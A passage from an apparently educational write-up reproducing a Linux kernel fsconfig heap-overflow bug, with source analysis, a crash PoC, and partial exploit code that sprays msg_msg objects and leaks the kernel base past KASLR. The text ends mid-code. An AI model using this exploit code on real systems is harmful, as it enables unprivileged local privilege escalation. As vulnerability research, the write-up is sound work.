                .type        = fs_value_is_undefined,
        };

        ...

        case FSCONFIG_SET_STRING:
                param.type = fs_value_is_string;
                param.string = strndup_user(_value, 256);
                if (IS_ERR(param.string)) {
                        ret = PTR_ERR(param.string);
                        goto out_key;
                }
                param.size = strlen(param.string);
                break;
        ...

                default:
                break;
        }

        ret = mutex_lock_interruptible(&fc->uapi_mutex);
        if (ret == 0) {
                ret = vfs_fsconfig_locked(fc, cmd, &param);
                mutex_unlock(&fc->uapi_mutex);
        }

...

The param structure is defined as follows:

/*
 * Configuration parameter.
 */
struct fs_parameter {
        const char                *key;                /* Parameter name */
        enum fs_value_type        type:8;                /* The type of _value */
        union {
                char                *string;
                void                *blob;
                struct filename        *name;
                struct file        *file;
        };
        size_t        size;
        int        dirfd;
};

This then calls the key function vfs_fsconfig_locked. Its switch has no case for our cmd, so execution reaches default, where the if condition is normally not satisfied, as shown below:

        default:
                if (fc->phase != FS_CONTEXT_CREATE_PARAMS &&
                    fc->phase != FS_CONTEXT_RECONF_PARAMS)
                        return -EBUSY;

                return vfs_parse_fs_param(fc, param);
        }
        fc->phase = FS_CONTEXT_FAILED;
        return ret;
}

so vfs_parse_fs_param is called next

vfs_parse_fs_param

int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
        int ret;

        if (!param->key)
                return invalf(fc, "Unnamed parameter\n");

        ret = vfs_parse_sb_flag(fc, param->key);

        ...

        if (fc->ops->parse_param) {
                ret = fc->ops->parse_param(fc, param);
                if (ret != -ENOPARAM)
                        return ret;
        }

        ...
}

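It calls parse_param from the ops table that the fs_context points to, i.e. it parses the parameter we passed. Which table that is was deferred when we analysed fsopen; here is the relevant code again: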

        ...
        /* TODO: Make all filesystems support this unconditionally */
        init_fs_context = fc->fs_type->init_fs_context;
        if (!init_fs_context)
                init_fs_context = legacy_init_fs_context;

        ret = init_fs_context(fc);
        ...

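In willsroot's own words

What we abused in the exploit was ext4. Our initial fuzzing crash happened on the Plan 9 filesystem. It seems that neither of these filesystems (nor a good many others) sets the init_fs_context field, so they all default to legacy and can go down the legacy_parse_param path.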

/*
 * Initialise a legacy context for a filesystem that doesn't support
 * fs_context.
 */
static int legacy_init_fs_context(struct fs_context *fc)
{
        fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL_ACCOUNT);
        if (!fc->fs_private)
                return -ENOMEM;
        fc->ops = &legacy_fs_context_ops;
        return 0;
}

The operations table is:

const struct fs_context_operations legacy_fs_context_ops = {
        .free                        = legacy_fs_context_free,
        .dup                        = legacy_fs_context_dup,
        .parse_param                = legacy_parse_param,
        .parse_monolithic        = legacy_parse_monolithic,
        .get_tree                = legacy_get_tree,
        .reconfigure                = legacy_reconfigure,
};

Back to vfs_parse_fs_param: it calls ops->parse_param, which in this table is legacy_parse_param. Let's analyse it

legacy_parse_param

/*
 * Add a parameter to a legacy config.  We build up a comma-separated list of
 * options.
 */
static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
        struct legacy_fs_context *ctx = fc->fs_private;         //a heap chunk zero-allocated at initialisation
        unsigned int size = ctx->data_size;                 //still 0 on the first call
        size_t len = 0;
        int ret;

        ret = vfs_parse_fs_param_source(fc, param);
        if (ret != -ENOPARAM)
            return ret;

        if (ctx->param_type == LEGACY_FS_MONOLITHIC_PARAMS)
            return invalf(fc, "VFS: Legacy: Can't mix monolithic and individual options");

        switch (param->type) {
        case fs_value_is_string:
                len = 1 + param->size;                         //len = 1 + length of _value
                fallthrough;
        case fs_value_is_flag:
                len += strlen(param->key);
                break;
        default:
                return invalf(fc, "VFS: Legacy: Parameter type for '%s' not supported",
                              param->key);
        }

        if (len > PAGE_SIZE - 2 - size)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");
        if (strchr(param->key, ',') ||
            (param->type == fs_value_is_string &&
             memchr(param->string, ',', param->size)))
                return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
                              param->key);
        if (!ctx->legacy_data) {
                ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
                if (!ctx->legacy_data)
                        return -ENOMEM;
        }

        ctx->legacy_data[size++] = ',';
        len = strlen(param->key);
        memcpy(ctx->legacy_data + size, param->key, len);
        size += len;
        if (param->type == fs_value_is_string) {
                ctx->legacy_data[size++] = '=';
                memcpy(ctx->legacy_data + size, param->string, param->size);
                size += param->size;
        }
        ctx->legacy_data[size] = '\0';
        ctx->data_size = size;
        ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
        return 0;
}

Let's go through the source above piece by piece

step1

First come a few assignments

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
        struct legacy_fs_context *ctx = fc->fs_private;         //a heap chunk zero-allocated at initialisation
        unsigned int size = ctx->data_size;                 //still 0 on the first call
        size_t len = 0;
        int ret;

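When the fs_context was first allocated, legacy_init_fs_context gave fc->fs_private a zero-filled heap chunk. The code here assigns that chunk to ctx and then reads its data_size into size; on the first call to this function both are 0.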

step2

switch (param->type) {
        case fs_value_is_string:
                len = 1 + param->size;                         //len = 1 + length of _value
                fallthrough;

        ...

        }

        if (len > PAGE_SIZE - 2 - size)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");

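I have stripped the irrelevant code. len is set to the length of the _value we passed plus 1 (the key length is added afterwards), and then a check follows, but this check is flawed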

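len is a size_t and size is an unsigned int, so the right-hand side is computed in unsigned arithmetic. If size + 2 > PAGE_SIZE, which with 4 KB pages means size has reached 4095, then PAGE_SIZE - 2 - size wraps around to a huge value, the check passes for any len, and the copy can run past the buffer. What this is good for is covered in detail later.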
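The wrap-around can be reproduced in user space by evaluating both forms of the check with the same operand types. This is a sketch: `TOY_PAGE_SIZE` assumes 4 KB pages and is typed unsigned long like the kernel's PAGE_SIZE on x86, and the two function names are made up for this example.

```c
#include <stddef.h>

#define TOY_PAGE_SIZE 4096UL  /* assumed 4 KB page, unsigned long as in the kernel */

/* Original check: returns 1 if the parameter would be rejected.
 * When size > TOY_PAGE_SIZE - 2 the subtraction wraps to a huge value,
 * so nothing is ever rejected. */
int rejected_by_original_check(unsigned int size, size_t len)
{
    return len > TOY_PAGE_SIZE - 2 - size;
}

/* Patched check: the same bound written as an addition, which cannot wrap
 * for these magnitudes. */
int rejected_by_fixed_check(unsigned int size, size_t len)
{
    return size + len + 2 > TOY_PAGE_SIZE;
}
```

With size = 4095 and len = 34, the original form accepts the parameter while the patched form rejects it; for ordinary values such as size = 4000 and len = 200 both forms agree and reject.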

step3

        if (strchr(param->key, ',') ||
            (param->type == fs_value_is_string &&
             memchr(param->string, ',', param->size)))
                return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
                              param->key);
        if (!ctx->legacy_data) {
                ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
                if (!ctx->legacy_data)
                        return -ENOMEM;
        }

The first if checks whether the key or the value contains a comma. Then, if this is the first call, legacy_data is still NULL, so kmalloc is called and the buffer is taken from kmalloc-4k.

step4

        ctx->legacy_data[size++] = ',';
        len = strlen(param->key);
        memcpy(ctx->legacy_data + size, param->key, len);
        size += len;
        if (param->type == fs_value_is_string) {
                ctx->legacy_data[size++] = '=';
                memcpy(ctx->legacy_data + size, param->string, param->size);
                size += param->size;
        }
        ctx->legacy_data[size] = '\0';
        ctx->data_size = size;
        ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
        return 0;
}

This is where our data is copied into the buffer held by ctx. After a few calls ctx->legacy_data looks like this:

{,key_0=value_0,key_1=value_1,......\0}

Modifying ctx is really just modifying the struct legacy_fs_context that fc->fs_private points to.

The bug has been present since v5.1-rc1. The fix is very simple: the subtraction is replaced with an addition, so the check can no longer wrap around.

diff --git a/fs/fs_context.c b/fs/fs_context.c
index de1985eae..a195e516f 100644
--- a/fs/fs_context.c
+++ b/fs/fs_context.c
@@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
                              param->key);
        }

-       if (len > PAGE_SIZE - 2 - size)
+       if (size + len + 2 > PAGE_SIZE)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");
        if (strchr(param->key, ',') ||

2. Writing a PoC to trigger the bug

Here is the finder's PoC first:

#define _GNU_SOURCE
#include <sys/syscall.h>
#include <stdio.h>
#include <stdlib.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)

int main(void)
{
        char* val = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        int fd = 0;
        fd = fsopen("9p", 0);
        if (fd < 0) {
                puts("Opening");
                exit(-1);
        }
        for (int i = 0; i < 5000; i++) {
                fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);
        }
        return 0;
}

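At first this did not trigger the bug for me, even though willsroot himself describes it as working "reliably".

After some printf debugging I found that the call returned -1, and the source shows that it bails out at a capability check.

From what I found online, ns_capable() validates the capabilities of a subject (the process) against an object (the resource):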

/**
 * ns_capable - Determine if the current task has a superior capability in effect
 * @ns:  The usernamespace we want the capability in
 * @cap: The capability to be tested for
 *
 * Return true if the current task has the given superior capability currently
 * available for use, false if not.
 *
 * This sets PF_SUPERPRIV on the task if the capability is available on the
 * assumption that it's about to be used.
 */
 bool ns_capable(struct user_namespace *ns, int cap)
{
        return ns_capable_common(ns, cap, CAP_OPT_NONE);
}

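This checks our privileges in the user namespace. The workaround is excerpted from arttnba3's blog.

willsroot's own blog also points this out, though I don't know why it is not reflected in his first PoC: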

This bug popped up since 5.1-rc1. It’s important to note that you need the CAP_SYS_ADMIN capability to trigger it, but the permission only needs to be granted in the CURRENT NAMESPACE. Most unprivileged users can just unshare(CLONE_NEWNS|CLONE_NEWUSER) (equivalent of the command unshare -Urm) to enter a namespace with the CAP_SYS_ADMIN permission, and abuse the bug from there; this is what makes this such a dangerous vulnerability.

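So with a small change to willsroot's PoC we can successfully cause a kernel panic.

We know where the bug is, but how do we trigger it? We have to push size, the number of bytes already written, up to the critical value. There is a catch, though: if you just call fsconfig with arbitrary arguments, you could keep calling it all day and still never get a kernel panic.

The original author's PoC is not arbitrary either; it is based on a calculation. Let's work through it.

Each call writes one ',', one '=', plus our key and value, so the number of bytes written is length(key)+length(value)+2, and every call has to pass this check: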

        if (len > PAGE_SIZE - 2 - size)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");

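So we need size to land on exactly 4095, that is, the allocated page has to be filled exactly. If an earlier write leaves a gap that the next write does not fit into, the check rejects that write and nothing further is appended. We therefore have to plan the writes so that size hits 4095 precisely. Below is the PoC I wrote based on my own understanding: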

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

int fsopen(const char *fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd, 
             const char *key, const void *val, int aux)
{
    return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

int main(void)
{
        int fd = 0;
        char* val = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        unshare(CLONE_NEWNS | CLONE_NEWUSER);
        fd = fsopen("ext4", 0);
        if (fd < 0) {
                puts("Opening");
                exit(-1);
        }
        for (int i = 0; i < 186; i++) {
                fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
        }

        fsconfig(fd, FSCONFIG_SET_STRING, "\x00", "P", 0);
        for(int i = 0; i < 0x4000; i++){
            fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
        }
        return 0;
}
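The choice of 186 iterations in the PoC above can be checked with a little user-space arithmetic. This is only a sketch of the byte counting described earlier (',' + key + '=' + value per call); bytes_per_call and size_after_padding are hypothetical helper names, not kernel functions.

```c
#include <stddef.h>
#include <string.h>

/* Bytes appended to legacy_data by one FSCONFIG_SET_STRING call:
 * ',' + key + '=' + value (the trailing '\0' is not counted in size). */
static size_t bytes_per_call(const char *key, const char *val)
{
    return 1 + strlen(key) + 1 + strlen(val);
}

/* data_size after `rounds` identical "peiwithhao" calls followed by
 * one call with an empty key and the one-byte value "P". */
static size_t size_after_padding(size_t rounds)
{
    size_t size = rounds * bytes_per_call("peiwithhao", "peiwithhao");
    return size + bytes_per_call("", "P");
}
```

Each "peiwithhao" call adds 22 bytes, so 186 calls give 4092, and the final 3-byte call brings size to 4095, after which PAGE_SIZE - 2 - size wraps.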

Result

After many test runs, this now triggers the kernel error reliably.

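IV. Message Queues

A message queue is a means of inter-process communication based on the System V model, and the way it works is not hard to follow.

The process that produces a message and writes it to the queue is usually called the sender, and one or more other processes are the receivers, which fetch messages from the queue. Each message consists of the message body and a (positive) number, which is used to implement several message types within one queue. Messages with the same number are handled in FIFO order. The message queue data structure involved is represented in the source by msg_queue: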

/* one msq_queue structure for each present queue on the system */
struct msg_queue {
        struct kern_ipc_perm q_perm;
        time64_t q_stime;                /* time of the last msgsnd call */
        time64_t q_rtime;                /* time of the last msgrcv call */
        time64_t q_ctime;                /* time of the last change */
        unsigned long q_cbytes;                /* current number of bytes on the queue */
        unsigned long q_qnum;                /* number of messages in the queue */
        unsigned long q_qbytes;                /* maximum number of bytes on the queue */
        struct pid *q_lspid;                /* pid of the last msgsnd caller */
        struct pid *q_lrpid;                /* pid of the last receiver */

        struct list_head q_messages;         
        struct list_head q_receivers;
        struct list_head q_senders;
} __randomize_layout;

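Besides the commented fields above there are three list_head members, which manage sleeping senders (q_senders), sleeping receivers (q_receivers), and the messages themselves (q_messages).

Each message on q_messages is wrapped in a msg_msg: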

/* one msg_msg structure for each message */
struct msg_msg {
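        struct list_head m_list;                         /* links this msg_msg to the others */
        long m_type;                                                 /* message type, supports the different message types in a queue described above */
        size_t m_ts;                /* length of the message body */
        struct msg_msgseg *next;          /* needed for long messages that do not fit in one page */
        void *security;
        /* the actual message follows */
};

struct msg_msgseg {
        struct msg_msgseg *next;
        /* the actual message follows */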
};

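msg_msg is similar to user_key_payload: both have a fixed-size header followed by the message body. The first chunk of a message occupies at most one page, and anything beyond that goes into msg_msgseg chunks, as shown in the figure below:

With the basic data structures covered, let's analyse the more important message queue system calls.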

1.msgsnd

long ksys_msgsnd(int msqid, struct msgbuf __user *msgp, size_t msgsz,
                 int msgflg)
{
        long mtype;

        if (get_user(mtype, &msgp->mtype))
                return -EFAULT;
        return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}

SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
                int, msgflg)
{
        return ksys_msgsnd(msqid, msgp, msgsz, msgflg);
}

The key function is do_msgsnd, which we now analyse step by step.

When a message is to be sent, do_msgsnd has to create room for it, and the function it calls for that is load_msg:

static long do_msgsnd(int msqid, long mtype, void __user *mtext,
                size_t msgsz, int msgflg)
{
        struct msg_queue *msq;
        struct msg_msg *msg;
        int err;
        struct ipc_namespace *ns;
        DEFINE_WAKE_Q(wake_q);

        ns = current->nsproxy->ipc_ns;

        if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
                return -EINVAL;
        if (mtype < 1)
                return -EINVAL;

        msg = load_msg(mtext, msgsz);

        ...

load_msg in turn calls alloc_msg to do the allocation:

struct msg_msg *load_msg(const void __user *src, size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg *seg;
        int err = -EFAULT;
        size_t alen;

        msg = alloc_msg(len);

        ...

Next, the alloc_msg function:

#define DATALEN_MSG        ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG        ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

static struct msg_msg *alloc_msg(size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg **pseg;
        size_t alen;

        alen = min(len, DATALEN_MSG);                 // the smaller of len and PAGE_SIZE - sizeof(struct msg_msg)
        msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
        if (msg == NULL)
                return NULL;

        msg->next = NULL;
        msg->security = NULL;

        len -= alen;
        pseg = &msg->next;
        while (len > 0) {         // a larger message, so msg_msgseg chunks are needed
                struct msg_msgseg *seg;

                cond_resched();

                alen = min(len, DATALEN_SEG);
                seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
                if (seg == NULL)
                        goto out_err;
                *pseg = seg;
                seg->next = NULL;
                pseg = &seg->next;
                len -= alen;
        }

        return msg;

out_err:
        free_msg(msg);
        return NULL;
}

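From the source we can see that when the body is larger than DATALEN_MSG (that is, header plus body exceeds PAGE_SIZE), additional msg_msgseg chunks are allocated to hold the rest of the body. The allocation flag is GFP_KERNEL_ACCOUNT.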
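The splitting done by alloc_msg can be modelled in user space to predict which allocation sizes a given message length produces. This is a rough sketch, not kernel code: the header sizes 0x30 and 0x8 are assumed for x86_64, and struct msg_layout and msg_layout_for are names invented for this example.

```c
#include <stddef.h>

#define SK_PAGE_SIZE 4096UL
#define SK_MSG_HDR   0x30UL   /* assumed sizeof(struct msg_msg) on x86_64 */
#define SK_SEG_HDR   0x08UL   /* assumed sizeof(struct msg_msgseg) on x86_64 */

struct msg_layout {
    size_t first_alloc;   /* kmalloc size of the msg_msg chunk */
    size_t nsegs;         /* number of msg_msgseg chunks */
    size_t last_alloc;    /* kmalloc size of the last segment, 0 if none */
};

static size_t sk_min(size_t a, size_t b)
{
    return a < b ? a : b;
}

/* Follows the same loop structure as alloc_msg, tracking sizes only. */
static struct msg_layout msg_layout_for(size_t len)
{
    struct msg_layout l = {0, 0, 0};
    size_t alen = sk_min(len, SK_PAGE_SIZE - SK_MSG_HDR);

    l.first_alloc = SK_MSG_HDR + alen;
    len -= alen;
    while (len > 0) {
        alen = sk_min(len, SK_PAGE_SIZE - SK_SEG_HDR);
        l.last_alloc = SK_SEG_HDR + alen;
        l.nsegs++;
        len -= alen;
    }
    return l;
}
```

For a body of 0x1018 - 0x30 = 0xfe8 bytes this yields a 0x1000-byte msg_msg plus one 0x20-byte msg_msgseg, which is the layout the leak in the next chapter relies on.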

2.msgrcv

long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
                 long msgtyp, int msgflg)
{
        return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

SYSCALL_DEFINE5(msgrcv, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
                long, msgtyp, int, msgflg)
{
        return ksys_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg);
}

As with send, it calls do_msgrcv to do the work:

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
               long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
        int mode;
        struct msg_queue *msq;
        struct ipc_namespace *ns;
        struct msg_msg *msg, *copy = NULL;
        DEFINE_WAKE_Q(wake_q);

        ...

        bufsz = msg_handler(buf, msg, bufsz);
        free_msg(msg);
        return bufsz;
}

In the end it calls the msg_handler function pointer. do_msg_fill was passed in for it at the start, so this amounts to calling do_msg_fill:

static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
        struct msgbuf __user *msgp = dest;
        size_t msgsz;

        if (put_user(msg->m_type, &msgp->mtype))
                return -EFAULT;

        msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz;
        if (store_msg(msgp->mtext, msg, msgsz))
                return -EFAULT;
        return msgsz;
}

/* message buffer for msgsnd and msgrcv calls */
struct msgbuf {
        __kernel_long_t mtype;          /* type of message */
        char mtext[1];                  /* message text */
};

The buf we passed in is treated as a struct msgbuf, and msgp->mtext is the real destination of the copy, which is performed by store_msg:

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
        size_t alen;
        struct msg_msgseg *seg;

        alen = min(len, DATALEN_MSG);
        if (copy_to_user(dest, msg + 1, alen))
                return -1;

        for (seg = msg->next; seg != NULL; seg = seg->next) {
                len -= alen;
                dest = (char __user *)dest + alen;
                alen = min(len, DATALEN_SEG);
                if (copy_to_user(dest, seg + 1, alen))
                        return -1;
        }
        return 0;
}

If msgflg contains MSG_COPY, do_msgrcv takes the following path:

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
               long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
        int mode;
        struct msg_queue *msq;
        struct ipc_namespace *ns;
        struct msg_msg *msg, *copy = NULL;
        DEFINE_WAKE_Q(wake_q);

        ns = current->nsproxy->ipc_ns;

        if (msqid < 0 || (long) bufsz < 0)
                return -EINVAL;

        if (msgflg & MSG_COPY) {
                if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
                        return -EINVAL;
                copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax));
                if (IS_ERR(copy))
                        return PTR_ERR(copy);
        }

        ...

This calls prepare_copy:

static inline struct msg_msg *prepare_copy(void __user *buf, size_t bufsz)
{
        struct msg_msg *copy;

        /*
         * Create dummy message to copy real message to.
         */
        copy = load_msg(buf, bufsz);
        if (!IS_ERR(copy))
                copy->m_ts = bufsz;
        return copy;
}

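This sets up a placeholder msg_msg that will receive the copy of the message. Now back to msgrcv.

Since we assume the MSG_COPY flag is set this time, execution continues to the following code: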

        for (;;) {
                struct msg_receiver msr_d;

                        ...

                        msg = find_msg(msq, &msgtyp, mode);

                        ...

                        /*
                         * If we are copying, then do not unlink message and do
                         * not update queue parameters.
                         */
                        if (msgflg & MSG_COPY) {
                                msg = copy_msg(msg, copy);                         // copy the msg without unlinking it; the returned msg is the destination, i.e. the copy argument
                                goto out_unlock0;
                        }

                        ...

                }

                ...

out_unlock0:
        ipc_unlock_object(&msq->q_perm);
        wake_up_q(&wake_q);
out_unlock1:
        rcu_read_unlock();
        if (IS_ERR(msg)) {
                free_copy(copy);
                return PTR_ERR(msg);
        }

        bufsz = msg_handler(buf, msg, bufsz);
        free_msg(msg);                 // finally free the copy

        return bufsz;
}

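Because we passed MSG_COPY, the message we receive is not unlinked from the list. It is copied into the temporary msg, handed to our user-space buf by msg_handler (that is, do_msg_fill), and finally the temporary msg we just created is freed.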

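V. Exploitation

1. Leaking the kernel base

We assume a real-world environment, so essentially every mitigation that should be on is on. First we deal with the address randomization caused by KASLR.

To leak the base address we use msg_msg together with seq_operations.

The one primitive we have so far is an overflow past legacy_data on the kernel heap, so how do we make use of whatever sits in the page after legacy_data? Heap spraying comes to mind, and here we spray msg_msg. One reason is that its size is controllable, and if the requested size is larger than a page an extra msg_msgseg is allocated to hold the rest of the message. The other is that its allocation flag is GFP_KERNEL_ACCOUNT, which matches what fsconfig uses for fc->fs_private, that is, legacy_data. A structure allocated with plain GFP_KERNEL would be isolated from it: allocations carrying the ACCOUNT flag generally come from kmalloc-cg-*, while those without it come from kmalloc-*.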

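I'll reproduce this following Will's write-up; the spraying technique there is also worth borrowing.

First we need a rough idea of how much to spray. We can use the command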

cat /proc/slabinfo

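to get a rough picture of the local machine. My kernel version is 6.2.

Since this is a large object, it is also allocated with kmalloc_large, so the corresponding slab is large as well. objperslab is 8, meaning one slab holds 8 such objects, so the amount to spray is roughly in that range.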

uint64_t do_leak(){
    uint64_t kernel_base;
    char pat[0x1000] = {0};
    char buffer[0x2000] = {0}, recieved[0x2000] = {0};      //PAGE_SIZE*2
    int targets[0x10] = {0};
    msg* message = (msg* )(buffer); 
    int size = 0x1018;      
    /* msg_msg: (0x30)head, (0xfd0)message_0
     * msg_msgseg: (0x8)head, (0x18)message_1, for kmalloc-32 :)
     * */

    /* spray the msg_msg */
    for(int i = 0; i < 8; i++){
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666|IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);      /* spray the 0x1018 msg_msg from the kmalloc-4k */
    }

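We start by spraying eight msg_msg objects. Note that the message length is (0x1018 - 0x30), which guarantees that an extra msg_msgseg is added. Because this will later be paired with seq_operations, the payload left for the msg_msgseg is deliberately sized at 0x18, which with its header comes to 0x20 in total and lays the groundwork for the later spray :)

After spraying we use fsconfig as usual to bring the buffer to the edge of overflowing, and then spray some more. The purpose is to raise the odds that the overflow lands on the header of a msg_msg.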

    memset(pat, 0x42, sizeof(pat));
    pat[sizeof(pat) - 1] = '\x00';

    info_log("Opening the ext4 filesystem");
    fd = fsopen("ext4", 0);
    if (fd < 0) {
        puts("Opening");
        exit(-1);
    }
    for (int i = 0; i < 186; i++) {
        fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", "P", 0);

 /* overflow, hopefully causes an OOB read on a potential msg_msg object below */
    info_log("Overflowing...");
    pat[21] = '\x00';
    char evil[] = "\x60\x10";
    /* it will write 23(21 + ',' + '=') bytes
     * but the up(4095) reserve '\x00', one byte
     * so this time we overflow 22 byte 
     * */
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);

    // spray more msg_msg
    /* it will spray the legacy data in some one spraying obj 
     * that is because kmalloc-cg-4k from a 8K chunk :)
     * it could include 8 kmalloc-cg-4k
     * we can use cmd [sudo cat /proc/slabinfo] for checking
     * */
    for (int i = 8; i < 0x10; i++) 
    {
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666 | IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);
    }

    info_log("overflow the msg->m_ts");
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", evil, 0);

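The final fsconfig overwrites msg_msg->m_ts, on the assumption that we most likely do land on a msg_msg header, which yields a read with an inflated length. The figure below shows the spray landing exactly where we overflow:

The figure below shows the state after the last fsconfig:

We can see that m_ts has been changed to 0x1060, so we can now read out of bounds. Remember the extra kmalloc-32 allocations from above? This is where they come in: they were sprayed along the way so that our seq_operations has some chance of ending up in the same slab as them.

The rest of the leak is routine: call msgrcv to get an OOB read and read the function pointers of a seq_operations adjacent to the extra msg_msgseg: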

struct seq_operations {
        void * (*start) (struct seq_file *m, loff_t *pos);
        void (*stop) (struct seq_file *m, void *v);
        void * (*next) (struct seq_file *m, void *v, loff_t *pos);
        int (*show) (struct seq_file *m, void *v);
};

Debugging shows that seq_operations->start is initialized to the kernel function single_start, so this gives us the kernel base.
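The leak PoC later in this section reads the leaked pointer at index 510 of the receive buffer. The sketch below shows where that number plausibly comes from, assuming the x86_64 layout used throughout (8-byte mtype, 0xfd0 bytes of body in the msg_msg, 0x18 real bytes in the msg_msgseg). The helper names are invented here, and the single_start offset is specific to one kernel build.

```c
#include <stddef.h>
#include <stdint.h>

#define SK_DATALEN_MSG 0xfd0UL  /* PAGE_SIZE - sizeof(struct msg_msg), assumed x86_64 */
#define SK_SEG_DATA    0x18UL   /* real payload bytes stored in the msg_msgseg */

/* Index, in 8-byte words of the buffer handed to msgrcv, of the first
 * qword lying just past the 0x20-byte msg_msgseg allocation. The buffer
 * starts with the 8-byte mtype, followed by mtext. */
static size_t first_oob_qword_index(void)
{
    size_t off = sizeof(uint64_t) + SK_DATALEN_MSG + SK_SEG_DATA;
    return off / sizeof(uint64_t);
}

/* Kernel base from a leaked single_start pointer; the offset is build-specific. */
static uint64_t kbase_from_leak(uint64_t leaked_single_start, uint64_t single_start_off)
{
    return leaked_single_start - single_start_off;
}
```

If a seq_operations object sits directly after the segment in kmalloc-32, that first out-of-bounds qword is its start pointer.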

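This should leak the base address, but at this point my leak was failing; more on that below :(

I later found this was most likely due to multiple cores: kmalloc has some chance of allocating on a different CPU, which causes the failure. Simply pinning the process to one core gives a fixed offset. (Later checks showed it can also succeed without pinning, but the success rate drops considerably, so pinning is the better choice.)

The leak PoC below has been modified accordingly.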

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>

#define IPC_PRIVATE (long)0
#define IPC_CREAT  00001000   /* create if key is nonexistent */
#define IPC_NOWAIT 00004000   /* return error on wait */
#define MSG_NOERROR     010000  /* no error if message is too big */
#define MSG_COPY        040000  /* copy (not remove) all queue messages */
#define SINGLE_START_OFFSET 0x35f200

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

#ifndef __NR_msgget
#define __NR_msgget 186
#endif

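/* The guards now test the macro they define. Note that 186/189/188 are the
 * arm64 numbers (x86_64 uses 68/69/70); <sys/syscall.h> normally defines
 * all of them already, so these fallbacks are rarely used. */
#ifndef __NR_msgsnd
#define __NR_msgsnd 189
#endif

#ifndef __NR_msgrcv
#define __NR_msgrcv 188
#endif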

/* to run the exp on the specific core only */
void bind_cpu(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int fd;                 /* using by filesystem */
typedef struct{
    long mtype;          /* type of message */
        char mtext[1];                  /* message text */

}msg;

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)
void info_log(char* str){
         printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
  printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
  exit(1);
}

long get_msg(int key, int msgflg){
